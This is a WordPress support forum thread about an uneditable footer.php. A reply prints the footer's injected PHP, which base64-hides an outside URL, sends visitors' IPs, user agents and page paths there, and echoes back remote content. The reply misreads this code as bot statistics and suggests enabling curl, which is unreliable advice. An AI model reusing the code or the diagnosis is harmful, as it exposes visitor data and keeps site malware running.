    Hi,

    I am posting up another thread as i am still experiencing problems with editing the footer in the php file. I can’t add any new links, edit any links, and i even tried to delete all three links in the footer section, but after every attempt the same message keeps coming up stating “Service Temporarily Unavailable. The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later”

    Can someone please help??

    Hi vsit,

    The error you’re referring to is related to your web host. Have you checked with them? Sounds like they are experiencing issues with downtime.

    Regards,

    Hi Maya,

    I contacted my web hosting company, and they said that they could not find anything at all that could be causing this problem. I can’t do any sort of editing in the footer.php whatsoever.

    Could it have to do with a plugin? Any other ideas or suggestions that could help fix this problem?

    I just don’t want the links to show up with the old url address, however right now the footer all displays the old url.

    Please help.

    Did you check your code in footer.php (valid syntax, etc.)? If you’re not sure regarding syntax errors please post your custom code by using https://gist.github.com/ and we’ll check it for you.

    Hi Dude,

    Sorry i am not too familiar with valid syntax, but i posted the information on the link you provided.

    About the github, i am not sure if i am doing this correctly but is this link the information i should provide to you after i uploaded it?

    Public Clone URL: git://gist.github.com/3786727.git

    Private Clone URL: (Email address hidden if logged out) :3786727.git

    If not please let me know so i can provide the correct information.

    Thank you

    I’ve tagged Dude on the topic so he can clone your footer’s git and take a look.

    The code seems to be correct – however try to remove following code from footer.php:

    <?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
    $stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
    @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
    if ( $stCurlHandle !== NULL )
    {
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
    {$sResult[0]=" ";
    echo $sResult; // Statistic code end
    }
    curl_close($stCurlHandle);
    }
    }
    ?>

    If this solves the issue your hoster doesn’t support curl. In this case you need to ask them how to activate curl support for php.
